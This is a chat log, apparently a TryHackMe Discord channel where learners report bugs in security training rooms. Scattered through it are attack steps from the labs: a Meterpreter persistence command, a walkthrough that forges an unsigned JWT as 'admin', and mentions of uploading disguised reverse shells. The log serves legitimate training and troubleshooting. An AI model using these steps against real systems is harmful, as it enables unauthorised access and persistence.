ah yes, sorry, I didn't scroll up. Ty MUTE3 🙂

I am receiving an error when attempting the rooms for my homework, can someone tell me what to do about it? https://prnt.sc/i2o78ivsJj6p used lightshot url uploader cause I cannot attach the screenshot here.

sorry, we can't help with homework. Need to work with your professor/teacher on that. You can post screenshots after you verify your account.

Room: Blaster Task: 3
Problem 1: It wants you to look through the browser history to see where user went. However, given the age of this room, IE doesn't show any recent pages. Since I saw the executable on the desktop, I was able to determine the CVE from there. You could try and find remnents in the users temporary internet files, but I don't think that's the intent of the question. If the goal is to understand that your browser history can betray you, that isn't learned here any longer.

Task: 4
Problem 2: Again, given the age of the room, the persistence script from msf5 is no longer used in msdf6 and there is now a persistence exploit module you need to use.. this means the answer about the command is incorrect.. The article it links to no longer shows the -X option and only references the -h option to show you its no longer the way to run it.. Answered the question as required by finding walkthough answer, but doesn't help new people doing it today.

I was unable to get persistence with the new module no matter whether I tried the service, exe or registry... in all cases, windows defender now recognizes the meterpreter shell (which appears to be the only payload you can attach to the persistence module).. So conceptually, it makes sense on how it should work, but you can't actually test it out and just mark it as completed.

Room: Ra
Link: https://tryhackme.com/room/ra

Issue: ||Spark 2.8.3|| requires JRE 8 which doesn't install on any of the latest Linux distributions - lack of warning for users has them spending hours looking for a solution

Solution: Include ||Spark 2.9.4|| (installs and runs with the latest version of JRE) since the exploit is still present.

It's possible to get JRE 8.

i've tried to install it on the attack box, the Kali VNC, and on my local VM, it's possible sure but it's a pain - a small notice of this wouldnt hurt to have

It's a hard rated room; it's not meant to hold your hand.
Debugging is a big part of hacking -- if it's plausible to find the problem in the real world (and in this case it absolutely is, daily lmao), then it's absolutely fair game for a hard CTF 🤷‍♂️

fair point

As you've proven, there are at least two ways to solve the issue. Reckon that's probably sufficient 😆

https://tenor.com/view/stickergiant-restart-turn-it-off-turn-it-on-it-gif-24960297

tell me when to laugh at this meme, it will make you happier

Right now

ah-ah-ah.

Now are you happy kid?

Yes

Hi I have completed the Nmap room, the room is 100% completed but in my dashboard it does not show it completed as per the screenshot I attach. Can someone help me?

same situation

same

Same here

I got the same issue

Im not asking for help with my homework, Im asking for help with the error that populates whenever I enter a room using THM . . . How did you interperret my question about the error as if I wanted help with the assignment? smh

And I refuse to give discord my phone # so if I cant get help with the error cause of this, then so be it.

bit disappointed tbh

I am receiving an error when attempting the rooms for my homework

Probably the fact you said homework...

But what is the issue?

Can you please verify your account and attach a screenshot if you wish to share a picture

same

same here :((

This is very likely due to a change that @obsidian kiln made in response to some feedback I gave them.. it's too coincidental that the problem started after they confirmed with me that they were making a change this am.. I brought it to their attention in a PM, but tagging them here as well.

This sort of bug appears every now and then.

There was a change made to clarify to folks that if you are a VPN user (and not an AttackBox user) that you will need to use -Pn since the Windows Firewall is treating the VPN traffic as public traffic and blocking ICMP.

Isn't that the point?

I mean. If people can't read error codes, that's on them..

Right, but as a beginner room teaching you Nmap, you get different results from using the AttackBox versus the VPN and since there is a task question directly related to it... well..

ARP, my beloved.

the firewall rules could be updated to recognize the VPN subnet as private, but with the older room it doesn't necessarily look like that's an option for the room maintainers.
Error codes and different results for beginners just gets them frustrated while learning. This one's my fault too.. First it was the local hosts file change that all the walkthough-followers are getting confused on and now this.. maybe I should just let sleeping dogs lie.. haha

Close enough isn't good enough for some of us. I always tell people, the difference between a 0 and 1 can sometimes determine whether my weekend is wasted troubleshooting or having an outage.

I disagree.

This room was a perfect room for VM users to experience reading error codes and maybe adding -Pn to the command.

Could certainly see that as well. Guess its just a matter of when to take the training wheels off. It's not a classroom setting or any way to directly ask questions. So with self-paced, you're left to figure it out on your own or to look for outside help, like the writeups that people do. And if you get different results than the writeups, or don't recognize that difference yourself, then you can flounder.... Since it was part of the beginner's path, I was thinking that the less variation the better. Even if this was past the halfway point and you'd become more familiar with Nmap at that point, it might be ok.. but it's placement this early in an independent learning path had me thinking that it needed more clarity for the future. Oh well.. just wish it didn't cause it to break.

Agreed with that, but there was a question in the room explicitly asking whether the machine responded to ICMP echo packets. Different environments would give different (correct) answers to that question.

Same as me here i was complete that room and got certificate from Complete Beginner where nmap is in Network Exploitation Basic

As folks work on other rooms/boxes and look at other tools, reading error codes and learning how to troubleshoot will be of great help and a must-have skill at least IMHO.

Im having the same issue with nmap! I'll check again and hopefully it's fixed soon!

Is this going off nmap scans?

Or the attackbox using Arp to ping?

Gave +1 Rep to @obsidian kiln (current: #9 - 726)

Not a bug but Cisco Talos Intelligence whois is not providing answer anymore for the Task #6 of the Room: Threat Intelligence Tools.
Q: What is the customer name of the IP address?
I can't provide the screenshot, dunno y. haha

nvm, just use whois in CLI, not Cisco Talos.
Thanks!

You'll have to verify your account to post screenshots

An ARP ping would definitely do it -- from memory nmap doesn't make a distinction when it does the host check (i.e., if either work, it calls it up).
I'm not sure if the discrepency is due to the private / public network firewall settings on the VM or if nmap is literally just falling back on ARP -- from memory the former. I think we did test this years ago

Same issue , please help

I always assumed this question refered to pinging the Ip without nmap, as in just the standard ping.

That's what I told anyone who had an issue anyway

Does it respond to the ping command when executed on the attackbox?

I don't think it did off the top of my head.

I'm not home to check.

Hey Muiri can you take a look it site help. Another person is having the same issue

Link? I have no idea what channel that is

#site-support

Can confirm, the nmap room doesn't respond when pinged in the attackbox

Which is the advice I'd give everyone, when they needed help with this question, and that's why I think the question was fine.

Also inculuded the stats.

Now that's interesting, so it is that it's falling back on ARP. In that case, I'll shove the question back in but add a hint

For Nmap, yes.

Arp will kick in due to the machines being on the same network.

Aye, exactly

Did think it was a bit weird for me to have forgotten to explicitly block something I was relying on for a question...

Can you tell how long it's been since I built this room?

~~1138 days ~~

for some goofy reason the NMAP room is showing up as 99%, while it's completely finished

Staff are working on this.

Thanks thanks :)

Burpsuite room task 7 isn't showing completion after answering all questions

What's up hackers!
I'm currently doing the Linux Modules and I'm precisely in the task of the xxd command.

The problem is that I'm spotting loads and loads of basic English mistakes.
For example, instead of saying "sought" which is the past tense of the vert to seek, it's written "seeked".

I mean no disrespect of course, as it's not an easy thing to create a room for people to learn.
However, I'm not even a native English speaker and I've been spotting some English mistakes.

I just wanted to provide you with this quick feedback as a THM user.
The THM platform is the best out there and should be immaculately spotless.
Thanks!

There is a bug on the VM of the Yara room that makes underscore characters not shown on screen

.

Seeked is perfectly valid in UK grammar.

Welcome to the club - I'm used to US English, but my manager is in the UK. 😅

Is it? Everything I've found says it's either a misconstruction or not in the dictionary.

I checked Merriam-Webster

The couple of things I found for it said that it was highly informal

Sought is the proper past tense.

Seeked is more used in dialect.

Not sure I can get behind this one lol

It's more commonly used in spoken English, than written.

Can someone double check my work on https://tryhackme.com/room/threatinteltools Task 6 and see if the domain has definitely changed? I couldn't find the expected answer with any of the normal options (Talos, AbuseIPDB, or WHOIS)

Whcih answer are you trying?

Ah my bad, Task 6, the associated domain name question

Is this room bugged? I already started attackbox and the IP is incorrect. How do I connect to the Kibana instance machine?

type 10.10.225.136 in firefox on the right

I don't know if this counts as a bug, but the Complete Beginner path has the old version of 'Burp Suite: The Basics'. It looks like comparable content to the new version, and I would imagine it would be nice for beginners to get credit on that rather than have to effectively repeat the room Nvm, looks like someone else found that last night and Scrubz already sent up the flare in #subscriber

posted here: #pentest-plus-path message but the https://tryhackme.com/room/lateralmovementandpivoting room network seems quite broken at the moment, VPN no longer connects (was working until this morning AEST) and even attackbox cant stay connected to the jump host

I believe I'm doing everything right. I was able to login a couple of hours ago. But then my machine restarted and now I am facing this bug.

I'm doing AoC2023 Side Quest 4, The Bandit Surfer.

@eternal kite Can you help?

There is no need to ping the Discord Admin, just post in one channel and someone will help you.

It's probably a room bug. I'm not sure anyone but the admins or staff will be able to help

It’s best to let community staff report it to us if there’s a problem 😄

Most employees who know how to deal with issues like these are relatively active in discord 👍

nothing on this? still an issue a day later...

You can’t connect with openvpn?

correct, specifically to the network for that room, the network also resets connections via attackbox

Linux Privilege Escalation room, task 8 (Capabilities) tells us to find a binary with a setuid capability to open flag4.txt (located in ||/home/ubuntu/flag4.txt||), but ||the flag file has chmod 644 making it world-readable, which bypasses the intended solution which is to use e.g. /home/karen/vim = cap_setuid+ep ||

Hi

Room: https://tryhackme.com/room/dataxexfilt
In «Task 3» the first image dont show up. (test it with 3 different browsers)
Is this the right place to report this?

Hi i have same problem

In room https://tryhackme.com/room/exploitingad, Task 2, "Exploiting Permission Delegation", there is mention of THMJMP1, which I believe should be THMWRK1. The -JMP1 name does not resolve, given the setting of "systemd-resolve --interface exploitad --set-dns 10.200.93.101 --set-domain za.tryhackme.loc" of Task 1. (Using the Attackbox.)

are the attacking ICS rooms no longer valid? there is something hinky with the python scripts

requesting help with wording from a room. I know the answer but the way its requested to be entered is not as logical

https://tryhackme.com/room/ctiaipb --> Task 1 question 3

Why not just post it here? It's literally what the channel is for.

How do i post videos here !?

You need to verify.

Thanks.

Gave +1 Rep to @quaint sparrow (current: #2 - 1857)

Found a Bug on SQL Injection Task 8

I'm having trouble with the Windows Privilege Escalation Room, and I'm unable to reset my progress in the room

Were you able to resolve this?

Might it be better to link to the OWASP Top-10 from 2021 in this new room?

Ref: #announcements message

For Vulnerabilities101 (https://tryhackme.com/room/vulnerabilities101) - task 4, question 1 (about NVD), it seems the NVD website changed so much that it's no longer possible to find the answer in the demonstrated way. I then tried to find the answer using the newer NVD search API, but the answer I found there didn't work. I also looked at a few writeups to find the answer, but this answer was not accepted either

This is working with no issues -

#room-help message

Thanks

Gave +1 Rep to @unborn pulsar (current: #20 - 350)

https://tryhackme.com/room/jupyter101 - The "supporting material" link (Task 2 + 3) no longer works.

in this room https://tryhackme.com/room/encryptioncrypto101 task 9 hint for question #4 it mentions a room called CC: Pentesting but when you go to that room https://tryhackme.com/room/ccpentesting it's private

Yeah, its private, the link should be removed

Cc @glad badger

how long does it take the network to reset in the Lateral Movement and Pivoting room

.

If it has taken more than a day to reset, I would recommend that you leave the network and simply re-join.

#room-help message

Disgruntled at task 5 question 4

the executes doesnt contain the goodbye.txt needed to search it up so the os-update.sh doesnt contain the output file 🙂

Room: Blaster
Task 3
Internet Explorer history doesn't show the search history. I checked 3 different walkthroughs to make sure I was looking in the right place.

Edit: It's not a big deal since the hint gives the answer.

Hint was changed to give the answer because the history on the box disappears :)

Howdy. Noticed a small error possibly.

“Walking an Application” task 3 when looking at the page source for the website, it shows an example of “You’ll see the contact page on line 31”

However it seems to be on line 28. Nothing that breaks the room just thought I’d let someone know 😁

That's strange, it is on line 31 for me

🤔

Guess it would be 28 if you didn't count the comments

¯_(ツ)_/¯

Seems like I cant post an image

🤷🏻‍♂️

You need to verify to do so

Ayoo, you are a real one Hiro, thanks

Are you on the /news page? Or maybe a different sub directory page? It being on line 31 is if you are viewing the source of https://10-10-184-214.p.thmlabs.com/. Seems like you are on https://10-10-184-214.p.thmlabs.com/news or something similar based off what I can see

Disregard

I sure was on /news 🤦🏻‍♂️ been a long day lol

lol, nw, that would explain the difference then

Yeah haha

#site-support

In Buffer Overflows room I guess the steps order of pop are reversed! and should be like this:
Store the value that was read from rsp into var
Increment the stack pointer by 8
references: http://6.s081.scripts.mit.edu/sp18/x86-64-architecture-guide.html
https://courses.cs.washington.edu/courses/cse351/17au/lectures/10/CSE351-L10-asm-III_17au-ink.pdf

@quaint sparrow how can I report this "misleading" false info please?

If you think its wrong, #room-bugs

ok thank you

Gave +1 Rep to @quaint sparrow (current: #2 - 1905)

#site-bugs

.

https://tryhackme.com/room/introtonetworking

Task 8 : [Networking Tools] Dig
Where is the very first place your computer would look to find the IP address of a domain?
local cache

Have searched for the answer. its all the same but it wont work

Did you try reading the task, or just go straight to the writeups? 🙂

oh im damn. i dident understand the question right. thats why i searched for the answer. sorry for that

All good 🙂
Just for the sake of improvement, what did you think that the question was asking? I can try to clarify it a bit better

Yes i guess, firstly is the host file, secondly is the local cache and finally is the dns right ?

No its correct. I thought first at the dns table (cache) but thats absolutely correct the first thing is the hosts file. We all put the ip in that file for several thm boxes 😉

..Are you really winking because you think the creator of the room is wrong? 🤔

I don't think so?

No im just a happy person. But sorry for that inconvenient emoji

Might just be me, it did read condescending.

My apologies.

Hei .... it's a ploiler .. can you hide that with the sploiler tag

Mate, the answer in the text is written in bold, italicised, and quoted and a genuinely concerning number of people still don't get it right.
Not sure a lack of spoilers is desirable here lmao

think he was being ironic

scrub opinion may or may not be valid but i agree with muiri here, i think hes the one most likely to have found the correct answer on this one 👍

Probably because Muiri created the room 😂

dont be jalous ahah

i've seen u contributed to some rooms urself, u will create many more and get promoted thm staff i beleive in u & I'm rooting for you, soon top 1 in /giverep takeover

Hi,
I think I've found a typo in room https://tryhackme.com/room/abusingwindowsinternals, task 4.

In the second code block, it reads

while (Thread32Next( // Obtains the next thread in the snapshot
    snapshot, // Handle of the snapshot
    &threadEntry // Pointer to the THREADENTRY32 structure
)) {

The typo is in "snapshot" handle which should be typed "hSnapshot".

Wow, good catch.

I know this has probably been reported before, but could someone add the 'dev-type tun' bit to the ovpn file for #enumerating-ad if possible? 😅

In a few rooms If I copy paste the flag or answer it doesn't work and I have to type it out, any fixes?

Hi, try using the clipboard in the attack box to confirm the text did in fact get copied before trying to post it in the THM answer space. I noticed it is a bit finnicky sometimes myself.

look for writeups, dont type it out

issue in container hardening room - error when executing command for analyzing struts2 image and container.tar filesystem

[0030] ERROR failed to fetch latest version: Get "https://toolbox-data.anchore.io/grype/releas
[0060] WARN unable to check for vulnerability database update
1 error occurred:

• db could not be loaded: the vulnerability database was built 5 days ago (max allowed
  age is 5 days)

is there a bug currently with breachad not showing in the "Breaching AD" room (Connecting from an AttackBox that I opened from inside the room and I aldo tried resetting the network)?

Something is definitely wrong with the AWS Cloud environments and the room "AWS VPC - Attack and Defense".
Got locked out of the environment for a whole week until manual fixes, I managed to finish the room today and now every click on the button "Generate environment" or "Reset environment" just goes into a 502 Bad Gateway response code.

I guess that without any manual intervention i'll be once again locked out of the environment for the time being.

Every time it's the same issue : you click on the generate environment button in that room, get an error message stating that something wrong happened while creating the environment and then you cannot do anything, so I guess it can be easily reproduced

So I found this... The BurpSuite room Intruder Task 10 mentions that the length should be shorter for the login creds... I have ran this thing like 30 times... I have not gotten the length to be different for the " Correct Creds." I used my bud Google and figured out that the answer was right in front of me all this time but the burpsuite was not working correctly. https://tryhackme.com/room/burpsuiteintruder?path=undefined Attached is the output that i was receiving time and time again. Just bringing it to the Dev's attention. Line Num:50 should be different, but its not...

hey i found a way to get root access in the recovery room, don't know if it's the way i should do it

i think yes, nevermind 🙂

I have a bug on the windowseventlog room https://tryhackme.com/room/windowseventlogs
I can't see the questions in the room i tried to change browser clear cache and private nav but the bug is still there.
It's on my side or is there anyone as the same ?

The questions appear on mine

https://tryhackme.com/room/uploadvulns could use a tiny update 🙂 Also, even if I delete js from the match, I can't see the .js file.
I googled this but didn't find a solution. Might it have changed more than this?

I'll restart burp, that might be the thing...

Everything updated and still no success. Though I found a video that shows that this worked in older burp: https://youtu.be/k_k1MQcHgEQ?si=gwn3soeML-521Yq3&t=115

Hey 👋 just to double check, could you try viewing in another browser please? Do you have any extensions that might be blocking/flitering content?

I remember someone else having this problem aaaaages ago. Have to search the depths of my memory to remember what the resolution was

https://tryhackme.com/room/rppsempire - The images in Task 5 and half of Task 6 don't seem to work (Broken Google Drive links)

Done!

There is a problem where anyone can get root to your servers contact me directly dont want to show others because of the sensitivity. Thankyou

There is a bug bounty programme, which you report security vulnerabilities

Yep i tried on a fresh VM and even my phone nothing.
i left the room and now i can see the answers and work with the room don't know what cause this bug but it's working now thanks

Gave +1 Rep to @dusky junco (current: #8 - 802)

Ty very much.

Gave +1 Rep to @topaz thorn (current: #92 - 67)

Not much of a bug but it's something. In Wireshark: Traffic Analysis, Task 11. It references two rooms but they aren't linked. (Warzone 1 and Warzone 2). They should be linked

Hi, I'm doing this room right now and I'm getting the same error: KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

/room/adcertificatetemplates

Seems the certificate is out of date. Let me push a new image

Issue has been resolved

Hi, I am trying to join this room but i can't
is there any solution??

https://tryhackme.com/room/adenumeration

Do you meet the requirements for the room? I.e. are you subscribed? If not, do you have a streak of 7 days as a free user?

i once had 100+ streak

You need to have a minimum of 7 at the time of joining the room

ok i see

thank you

Ya, think the "Virtualization and Containers" room is bugged beginning on or about Task 6. The room's web server VM appears to start and be accessible but the terminal is only quasi functiong. Necessary commands like 'minikube' and 'kubectl' aren't recognized. Has anyone found a solution?

Hi, I started making the room: https://tryhackme.com/room/breachingad last week, today I wanted to continue but it seems to be bugged. I enter the room and it asks me to join again, but in the process it shows 35% complete.

Join Room does nothing

I'm subscribed

The network rooms kick you out every 10ish days for capacity reasons, joining right back should work just fine though and your progress will never be removed. If you are unable to join back then there might be an actual issue (screenshots would be helpful if that is the case).

Hi, i do the room name « intro to logs » and i can’t submit my answer in section 4 about command line who is being executed

Hi, I'm doin lookback room, but unable to exploit it with metasploit, even performing with same payload as other users has used in their writeups

I think the machine is quiet not behaving like it should, that's why exploit is failing. So pls check and let me know

hi, I'm trying out the rust room (https://tryhackme.com/room/rust?path=undefined). I feel that the example given under secure in the introduction task is not quiet right. the example shows the concept of generators which exhaust after one use. the function call is not the one modifying the value as such. its the inner call (_ _next__) on the object which does. I kindly request the room creator/maintainer to modify the example to avoid confusions.

Hi all, I am doing the Benign challenge room and am having an issue with the last question. The C2 server link that I am suppose to access to give me the flag is giving me a 404 error.

Hey getting same error on the next Network (Persisting AD)

KRB-ERROR (16) : KDC_ERR_PADATA_TYPE_NOSUPP

Windows Internals room - Task Interacting with Windows Internals - when you enter the flag like it is on the machine running exe file to check popup output the capital letter H in the flag is actually a small letter h. But when you submit the flag with h, at the end it is displayed as H when you paste flag with H it show error.

Need to push a fix once a year. In the mean time, you can take the following steps to fix it yourself:

1. RDP to the DC
2. Run MMC
3. Add the certificate snap-in for the Computer Account
4. Under Personal, select request new cert
5. Request the Kerberos, Domain Controller, and Domain Controller Authentication certificates
6. Enroll

Should be working again then

I was doing https://tryhackme.com/room/obfuscationprinciples, task 4. I uploaded the PowerShell snippet without any modifications (on /challenge-1.html) and got the flag immediately, even though the output says sth about "fail":

The file ps.ps1 has been uploaded.fail!
Warning: unlink(C:\Users\Administrator\Desktop\pass-1.txt): No such file or directory in C:\xampp\htdocs\upload-1.php on line 42

Room: Easy Peasy - https://tryhackme.com/room/easypeasyctf
Task 2 - 2nd Flag

I've found the ||md5|| hash hidden in ||/robots.txt||
But I don't think there are any rainbow tables available to get the result. I've gone through 6 writeups and they all use the same website https://md5hashing.net/ which is no longer online.

I used hashcat and john with all the wordlists I could think of, but obviously none of them would have flag{randomString} in them. I've tried the rainbow tables on all of the websites in the picture without luck.

I can give the hash if you wanna try yourself.

What do you mean no longer online? I visited it just no and it is still accessible?

I think the certificate is out of date again in the persisting AD room

I'm not entirely sure if I'm just doing something wrong or not but following:

OWASP Top 10 - 2021 on Task 20: https://tryhackme.com/room/owasptop102021

An issue I have after copying the original cookie is that the string contains an invalid character, manipulating almost any part of the value itself returns something but im not sure if doing so causes the cookie then to be invalid because its not what the website itself thinks it should be getting?

Token/Cookie:

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNzA4MjAzOTc0fQ.k_4v9TGt8iYEl0tkNyufO6RciDeS0T1mHWRPKaTRRvA

I've tried to just do as much troubleshooting as I can but I'm simply not sure if I'm missing something really simple here

here's the image of what happens when i try and put the cookie into the base64 decoder

Please change the link from the rooms for the OpenVPN to direct to this one: https://openvpn.net/community-downloads/

You can just decode the header and payload as the task says (ignore the signature) and there should be no error.

ok thank you, i'll try and let you know

Gave +1 Rep to @clear hornet (current: #43 - 162)

@clear hornet still get an error unfortunately-

What exactly are you typing in because that gives me no error at all

ok so, upon entering the site w/ the proper starting login- opening the dev console gives this as the cookie

eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6Imd1ZXN0IiwiZXhwIjoxNjY1MDc2ODM2fQ.C8Z3gJ7wPgVLvEUonaieJWBJBYt5xOph2CpIhlxqdUw

and after running it in the decoder this is the error that i get- and removing one of the characters does fix it- after which i change the it from

{"typ":"JWT","alg":"HS256"}{"username":"guest","exp":1708215946}@ÚAfëUß.8ýú@tµhGºB½iÊÌ#y

to

{"typ":"JWT","alg":"none"}{"username":"admin","exp":1708215946}@ÚAfëUß.8ýú@tµhGºB½iÊÌ#y

and re-encode it, and putting the string given back into the console it just says its wrong

You have the signature there still, you only need the header and payload. Make sure you are doing it exactly how the task says to.

removing the signature still comes back as it being wrong

are the dots important? i noticed trying to encode it, gets rid of them, and trying to figure out where to put them (one at the end where the signature would've been and one to seperate the header from the payload) i'm unable to see where the header vs payload dot would go? would that be what's causing it?

Try to encode them separately and then put a dot between them and a dot at the end

ok that worked, thank you so much oh my goodness

Gave +1 Rep to @clear hornet (current: #43 - 163)

Think there might be a bug in terms of answering the last question of the Benign Room to where it is supposed to be https://controlc.com/548ab556.

Can you link the room please?

https://tryhackme.com/room/benign

@quaint sparrow Here you go.

Didn't work for me either, I'll need to do this room.

Interesting. Think there might be something wrong with the back end.

Any luck?

I just went through the room myself and it accepted my answer (what you typed there was not the answer I found though)

That’s weird.

What was the correct input?

Sorry just got back to this.

You're right the websites still up. It was something on my end preventing the connection.

@clear hornet

Not really sure we are supposed to just share answers here. Have you tried to go through the room again and make sure you are doing it properly? Perhaps you could send a screenshot of where you got your answer and I could help you move from there to the correct one?

if so also go in #room-help

as it technically not a bug probably

oh yeah we should do that

Okay, I have posted my question there.

Hey there, I am in the Learn the Linux Fundamentals Part 2: Permissions 101. And when I launch the attackbox and use the terminal I am not getting the same directories as the guided video. And I have closed the attackbox before and relaunched it and that didn't work either. Is there anything else I could try clear this up or is it a bug?

You need to open the attackbox, then the Linux Fundemental 2 room, and SSH in to the IP.

Thank you for that advice, I was able to look back at the beginning of the module to find the instructions 😄

Gave +1 Rep to @quaint sparrow (current: #2 - 1987)

Hi, i can not see the KoTH page to submit flag

event the completed KoTH showing the same empty page

Spectate link?

Oh I see it

Same

Let me report

is that because i patch the rabbit hole ?

Looks like it's a site bug

oke ... hope got to fix that soon ... thank you

Hey has anyone completed SSDLC?

I'm on the last task and entered the flag correctly, but it doesn't seem to be working

#room-help

can't it be a bug/issue with the room, if Im entering the flag correctly, but it's not going through?

This is unlikely. It’s best to first ask for help to see if it’s a bug, our community volunteers will be able to verify 🙂

okay I haven't been getting an answer on it and I'm just frustrated that the last question isn't going through haha

I'll wait for an answer in room-help then

thank you

From the report you have the MD5, search it in VirusTotal webpage and you will get the SHA256 there 🙂

Hi, the download link to github to download the ncat.exe in https://tryhackme.com/room/steelmountain is wrong.

It should be the one in the windows-binaries tool; nc.exe

and rename the ncat.exe to nc.exe doesnt work

so you need to get the one from the windows-binaries

For more information, dm me staff :))

:hammer: nattram#0 has been banned.

Room Malbuster Q3, the answer 51 does not work. The answer to this question is also subject to change over-time in virus total

59 is current in virus total and that does not work

might be worth removing the question as the number will change over-time in virus total and people will most definitely get it wrong

I agree, however I don't think removal is the answer.

I suggest keeping the question, working of a screenshot, placing a disclaimer to let the user know that if they do X then the result Y will happen,

That way they can still answer the question & do the practical.

or the other alternative is to do one of those button click questions, i.e "Check number of detections in virus total" then you just hit the complete button for that bit and move to the next question

Hi there. I don't know why but in WebOsint room, even though my own reasearch and every writeup I could possibly find shows ||6613102107|| as an answer for Q2 Task 2 tryhackme still can'r accept it. Is it the room problem or am I doing something wrong?

https://tryhackme.com/room/threatmodelling
the following question is outdated by 1 (I already got the answer right so maybe this was already updated, not really a 'bug' but wanted to let you guys know)
https://mitre-attack.github.io/attack-navigator/

https://tryhackme.com/room/owaspapisecuritytop105w

Task 3
Question 1

Answer format is asking for one letter but doesn't accept anything.

It's asking for a number

https://tryhackme.com/room/powershell
T3Q1
You are tasked to find a predefined file, the file in reality ||has double extension (.txt.txt)||

T4Q4
the provided hint should be for T4Q6 and/or T4Q7 for network info is not the same as group info.

T6
We are tasked to find all open ports in the range of 130-140. Correct answer is ||just total count of ports in range, instead of open ports|| as was tasked.

Surprised that the room is 1400+ days old with ~34k completions and still running into bugs like that, but I guess no one has reported them thus far, and it's just been shrugged off by everyone.

Same problem here 2.5 years later.

@vagrant latch

https://i.imgur.com/7lhsyf0.png

In soc level 1 learning path
Snort live attack challenge
At the first task the rule have to drop the connections to port 22 then you will get the flag but when you drop the packets to port 80 you also receive the flag

Why ?

Mysql port is not open on internal network host. Machine name -> Contain Me

https://tryhackme.com/room/securesdlc
Task7 Security Assessments

When do you typically carry out Vulnerability Assessments or Pentests? -- question
The answer is this: xxxxxxxxxx x xxxxxxxxxxx .
But the correct answer would be xxxxxxxxxx xxx xxxxxxxxxxx this.
"and" instead of "a" would be the fix
I don't know if this is a bug sry if this is actually not a bug.

It seems you already have initial access to the target. Are you at the privesc step? I'm still stuck in it as well, but there should be a binary you need to supply some input to get root access.

This accessed machine has 2 ethernet interfaces. One of them we enter using a shell, the other one is connected to a host in the internal network. I am already rooted on externally accessible Host1 but when i was reach Host2(Internal host) with Mike cannot doing vertical privesc cuz SQL service, which should normally be open, is not open.

In aoc 23 day 11 when you start the box the tools, whisker and rubeus, are there as they should when you start the box, but if you're not quick enough they are removed. If you restart the box and do all the commands at once it works, but you should have the time to read and ponder, right 🙂

Room: Source Code Security
Task: 8
Bad link URL
Problem: There a dot '.' at the end of the link to:
https://docs.gitlab.com/ee/ci/yaml/gitlab_ci_yaml.html.
Solution: Remove the dot at the end of the link
url target.

good spotting

Room URL: https://tryhackme.com/room/sourcecodesecurity
Summary: Task 3, 'How does it work?' section, same paragraph appears twice with only minor differences.

+1 to this request - BurpSuite still does not render .js content. I overcame the issue by disabling the script altogether.

The Task #7 in UploadVulns room says "Having reloaded the webpage to put the filter back in place, let's take the reverse shell that we used before and rename it to be called "shell.jpg". As the MIME type (based on the file extension) automatically checks out, the Client-Side filter lets our payload through without complaining:", however this is not true for java.uploadvulns.thm filter script, which still needs to be disabled before uploading the jpg file.

That's because the client-side-filter.js is expecting a different filetype, read the source code again

Flag13 in Windows Local Persistence only works when you revert the steps from flag12. So you have to delete C:\windows\revshell.exe from Userinit.

https://tryhackme.com/room/windowslocalpersistence 🙂

Hi guys, there's a typo in Task13 of WireShark101:
https://tryhackme.com/room/wireshark

It should be task13.pcap rather than task11.pcap.

Thanks and have a good weekend 🙂

thank you for this - the answer was driving me nuts as I couldn't find it

Gave +1 Rep to @late oxide (current: #2022 - 1)

I think there is something wrong with the question "When was the SSL certificate the phishing domain used to host the phishing kit archive first logged? (format: YYYY-MM-DD)" in the room https://tryhackme.com/room/snappedphishingline

I have checkt VirusTotal, crt.sh and other resources, but can't geht the right answer.
I have also checked the writeups, but it seems like the question was changed.

Hey all,
I'm unable to deploy linux machine due to password and it says permission denied please try again.
https://tryhackme.com/room/linuxfundamentalspart2
Im in the above task

It asks to use tryhackme and Im using the same but denying.
Any help

Not a bug.

You're using the wrong IP.

My bad! Thanks tho @quaint sparrow

Gave +1 Rep to @quaint sparrow (current: #2 - 2040)

@quaint sparrow could you check that or tell me where to ask?

You've asked in the correct channel, the answer will need updated. That's all.

Thanks!

Gave +1 Rep to @quaint sparrow (current: #2 - 2041)

In room Data Exfiltration are wrong some images
https://tryhackme.com/room/dataxexfilt
this: https://tryhackme-images.s3.amazonaws.com/user-uploads/5d617515c8cd8348d0b4e68f/room-content/c2b48bf0b212e640b259a3405c2391b1.png

Hello, in Burp Suite Basics room task 13, we need to download PortSwigger Certificate from Burp Suite.
The room tells you to go to http://burp/cert which did not work for me. However, what worked was to go to http://burp or http://burpsuite and click the CA Certificate button.

And, uh, to what link does the CA Certificate button point?

⚠️ FYI there's a broken link right at the end of https://tryhackme.com/room/dfirprocesslegalconsiderations
pointing to: https://tryhackme.com/room/dfirplaybooks

The target machine has the same resources regardless if you connect to it via your own VM or the Attackbox.
So to me this sounds more like an issue on your end, like having had multiple VPN connections or a MTU value that's not working well on your end 🙂

https://tryhackme.com/room/persistingad
Task 3
One's supposed to be illegitimate not both are supposed to be legitimate

this machine is really really slow like unplayably slow

for me

for me

????

my bad

it was my vpn file

Offensive pentesting pathway,
https://tryhackme.com/room/skynet
Has a expired writeup link https://blog.tryhackme.com/skynet-writeup/
Blog.tryhackme.com doesn't even exist anymore

Just to mention, in the ConvertMyVideo Room, the yt_url call is taking too much time, either not returning anything or returning value after too long. Pretty sure this needs to be checked!!

@last loom The "Unattended" room has waaaay to little resources. It can barely crawl. I used 10minutes to open RegistryExplorer, and autopsy is barely usable.

I love the rooms tasks, but the VM is barely functional

The one that you pinged is the THM bot.

oh, thanks

Gave +1 Rep to @unborn pulsar (current: #15 - 470)

Someone should respond to your concern though when they see or come across it.

ok, so I should just leave it here, hoping that some of the staff catch it? 😅

I have catched it and we will look into it 🙂
Thank you for bringing it up!

Gave +1 Rep to @leaden fossil (current: #2030 - 1)

Nice 🙂

hi all, I found a bug in the room "Blaster": https://tryhackme.com/r/room/blaster
@heavy spade and @dusky junco
[SPOILER on deprecatad option]

Original request:
`Last but certainly not least, let's look at persistence mechanisms via Metasploit. What command can we run in our meterpreter console to setup persistence which automatically starts when the system boots? Don't include anything beyond the base command and the option for boot startup.

||run persistence -X||

Run this command now with options that allow it to connect back to your host machine should the system reboot.`

Metasploit 6.3.55-dev output:

`meterpreter > ||run persistence -X||

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[-] The specified meterpreter session script could not be found: persistence`

